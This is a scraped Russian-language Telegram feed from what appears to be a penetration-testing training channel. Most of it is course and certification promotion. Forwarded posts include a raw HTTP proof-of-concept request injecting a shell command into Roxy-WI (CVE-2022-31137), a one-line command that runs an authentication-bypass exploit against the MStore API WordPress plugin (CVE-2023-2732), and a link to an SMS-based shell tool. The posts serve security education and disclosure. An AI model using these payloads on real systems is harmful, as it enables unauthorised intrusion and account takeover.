NetRunner ищет новые кадры к себе в команду
Мы станем вашим трамплином в профессиональную деятельность
Нам нужны:
- Начинающий Web-дизайнер креативщик (Figma)
- SMMщик для YouTube
- Начинающий маркетолог
- Монтажер
Контакты для связи: @netrunner_1G
Мы станем вашим трамплином в профессиональную деятельность
Нам нужны:
- Начинающий Web-дизайнер креативщик (Figma)
- SMMщик для YouTube
- Начинающий маркетолог
- Монтажер
Контакты для связи: @netrunner_1G
👍4🤔4❤🔥3😍2
Forwarded from Похек (Сергей Зыбнев)
🔴Roxy WI v6.1.0.0 Unauthenticated Remote Code Execution (RCE) via subprocess_execute
CVE-2022-31137
Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле
PoC:
#CVE #POC
CVE-2022-31137
Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле
/app/options.py. Злоумышленник может использовать эту уязвимость, отправив специально подготовленный HTTP-запрос, который содержит вредоносный код. Вредоносный код будет выполнен на уязвимой системе с привилегиями пользователя, запускающего Roxy-WI.PoC:
POST /app/options.py HTTP/1.1";id+##&backend_server=127.0.0.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=
#CVE #POC
❤7
Forwarded from RESOLUTE ATTACK
Видеообзор мероприятия от лица нашей команды. Positive technologies, Codeby, Innostage и другие известные компании.
И многое другое в нашем видеоролике - https://youtu.be/MYfDoC2JC4M
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Обзор PHD 12 | Positive Hack Days 12
RESOLUTE ATTACK приехал в Московский Парк Горького на PHdays '12, чтобы вкратце показать вам как это было.
Positive Hack Days — форум по кибербезопасности, объединяющий экспертов по ИБ и этичных хакеров со всего мира.
Live студия, Stand Off, взломы банкоматов…
Positive Hack Days — форум по кибербезопасности, объединяющий экспертов по ИБ и этичных хакеров со всего мира.
Live студия, Stand Off, взломы банкоматов…
👍3🔥3❤2
По завершению второго и третьего месяца обучения на нашем курсе, будет проходить отбор из лучших учеников для практики, c нашими ведущими специалистами из отдела Pentest.
1. Доступ к реальным кейсам компании
2. Личные практические задания
3. Корпоративный контент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤🔥5🔥3😍2
Forwarded from Похек (Сергей Зыбнев)
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u https://TARGET#CVE #POC
❤9👍3
Начнем с позитивного. Есть несколько хороших новостей.
1) Мы разрабатываем свою обучающую платформу. Чуть позже покажем дизайн. Он вам очень понравится.
Мы развиваемся и совершенствуемся, чтобы предоставлять вам качественные материалы и полную поддержку.
2) Для участников нашего курса ведется разработка бесплатного дополнения (по желаниям самих учеников) и не только
Теперь немного о грустном:
Вследствие некоторых обстоятельств уже бывший сотрудник попытался нас шантажировать и после неудачной попытки попытался распространить материалы курса. Меры приняты, утечку локализовали.
Оказалось, что с подобными сотрудниками информация - в опасности. Не все могут работать в области информационной безопасности 😒 Коммерческая тайна, конфиденциальность, да и просто человеческое доверие для некоторых - пустой звук.
Большое спасибо всем участникам текущего потока за поддержку и понимание нашей команды. Мы вас любим и ценим! Грустно, когда предают.
С уважением, команда NetRunner ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤8🤔6❤🔥3
Forwarded from linkmeup
Отлично! Теперь шелл можно и через SMS пропихнуть.
Пока безопасники бьются с DLP, настраивают политики и заливают порты эпоксидкой, просто отправь SMS на номер.TCPoverSMS, my ass.
https://github.com/persistent-security/SMShell
Пока безопасники бьются с DLP, настраивают политики и заливают порты эпоксидкой, просто отправь SMS на номер.TCPoverSMS, my ass.
https://github.com/persistent-security/SMShell
🔥11👍3
Всем привет, очередные новости от NetRunner⛈
Во первых, хотелось бы рассказать о нашем оффлайн проекте.⬇️
Так как наша задача - популяризация ИБ, мы организуем кружки на базе школ для учеников. Первый запуск пройдет в городе Новосибирск.
В следующем году будем открывать в популярных городах России.
📌 Так же представляем вашему вниманию наш курс по по подготовке к PRTT на платформе наших друзей и партнеров из CyberYozh. Курс будет проходить на платформе CyberYozh Academy название курса "WEB pentest base". В курсе 24 модуля и 31 практическое задание. Курс будет по сниженной цене, без менторства.
Наверняка уже все заметили что у нас поменялся логотип канала. На днях мы выпустим пост с логотипами и проведем голосование за лучший логотип Netrunner на ваш выбор.
❗️ Просим проявить максимальную активность в голосовании
Во первых, хотелось бы рассказать о нашем оффлайн проекте.
Так как наша задача - популяризация ИБ, мы организуем кружки на базе школ для учеников. Первый запуск пройдет в городе Новосибирск.
В следующем году будем открывать в популярных городах России.
Наверняка уже все заметили что у нас поменялся логотип канала. На днях мы выпустим пост с логотипами и проведем голосование за лучший логотип Netrunner на ваш выбор.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥15🔥9❤3👍1
Подборка из вариантов логотипа NetRunner ⛈
Как и обещали выкатываем голосование, все зависит от вас ☺️
Как и обещали выкатываем голосование, все зависит от вас ☺️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9
👍1
Доброго вечера друзья, и мы опять спешим вас порадовать ⛈
Совместно с компанией CyberYozh мы на днях анонсируем серьезный курс посвящённый взлому инфраструктуры компаний, так же из тем будут присутствовать:
1) Естественно анонимность и создание своего окружения, лаборатории
2) Криптовалюта, анонимное использование и тд.
3) Девайсы для хакера и как ими пользоваться
4) Социальная инженерия
5) Форензика
6) Монетизация своих знаний
Забавную отсылку можно найти тут)
__
Новости по кусу "Подготовка к PRTT"
📣 Вот и завершился первый месяц нашего курса "Подготовки к PRTT", Если хотите узнать мнение наших учеников, их отзывы будут на картинке в комментариях⬇️
Не смотря на все сложности которые мы уже преодолели, мы уделяем каждому ученику внимание и воспитываем этичных хакеров.
Совместно с компанией CyberYozh мы на днях анонсируем серьезный курс посвящённый взлому инфраструктуры компаний, так же из тем будут присутствовать:
1) Естественно анонимность и создание своего окружения, лаборатории
2) Криптовалюта, анонимное использование и тд.
3) Девайсы для хакера и как ими пользоваться
4) Социальная инженерия
5) Форензика
6) Монетизация своих знаний
Забавную отсылку можно найти тут)
__
Новости по кусу "Подготовка к PRTT"
Не смотря на все сложности которые мы уже преодолели, мы уделяем каждому ученику внимание и воспитываем этичных хакеров.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤3🔥3
Forwarded from RESOLUTE ATTACK
⚡️ PRTT - PENETRATION RED TEAM TESTER
Наступил тот момент, который вы так долго ждали! Мы запускаем старт второго потока нашей сертификации по тестированию на проникновение. Сертификация PRTT уже заявила о себе и готова идти дальше.
Множество людей поддержало нас в развитии данной сертификации, мы готовы перевернуть свой листок истории, а готовы ли вы перевернуть свой?
Старт: 01.10.2023
Стоимость: 40 000Р
Длительность сертификационного курса: 4 месяца
Как приобрести сертификацию?
На нашем официальном сайте, в разделе сертификации, достаточно заполнить анкету участника
Появились вопросы?
Мы с радостью ответим - @PRTT_ATTACK
Также, в честь запуска второго потока обучения мы открываем один эпизод из PRTT. Ждём вас на премьере.
⚡️Сегодня, в 18:00 мск - https://youtu.be/n381lZ06KIs
Наступил тот момент, который вы так долго ждали! Мы запускаем старт второго потока нашей сертификации по тестированию на проникновение. Сертификация PRTT уже заявила о себе и готова идти дальше.
Множество людей поддержало нас в развитии данной сертификации, мы готовы перевернуть свой листок истории, а готовы ли вы перевернуть свой?
Старт: 01.10.2023
Стоимость: 40 000Р
Длительность сертификационного курса: 4 месяца
Как приобрести сертификацию?
На нашем официальном сайте, в разделе сертификации, достаточно заполнить анкету участника
Появились вопросы?
Мы с радостью ответим - @PRTT_ATTACK
Также, в честь запуска второго потока обучения мы открываем один эпизод из PRTT. Ждём вас на премьере.
⚡️Сегодня, в 18:00 мск - https://youtu.be/n381lZ06KIs
🔥9👍5❤3
Forwarded from RESOLUTE ATTACK
PRTT - ОБЗОР ОТ СТУДЕНТОК
Обзор от действующих студенток сертификационного курса PRTT
📺 Трансляция: 15.07.2023 в 20:00
Студентки поделятся своим мнением, расскажут о плюсах и минусах первого потока. Рассмотрят часть методического материала, решат пару лабораторных задач, представленных на курсе.
Обзор от действующих студенток сертификационного курса PRTT
Студентки поделятся своим мнением, расскажут о плюсах и минусах первого потока. Рассмотрят часть методического материала, решат пару лабораторных задач, представленных на курсе.
Please open Telegram to view this post
VIEW IN TELEGRAM
Youtube
- YouTube
Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.
❤🔥8🔥5👍3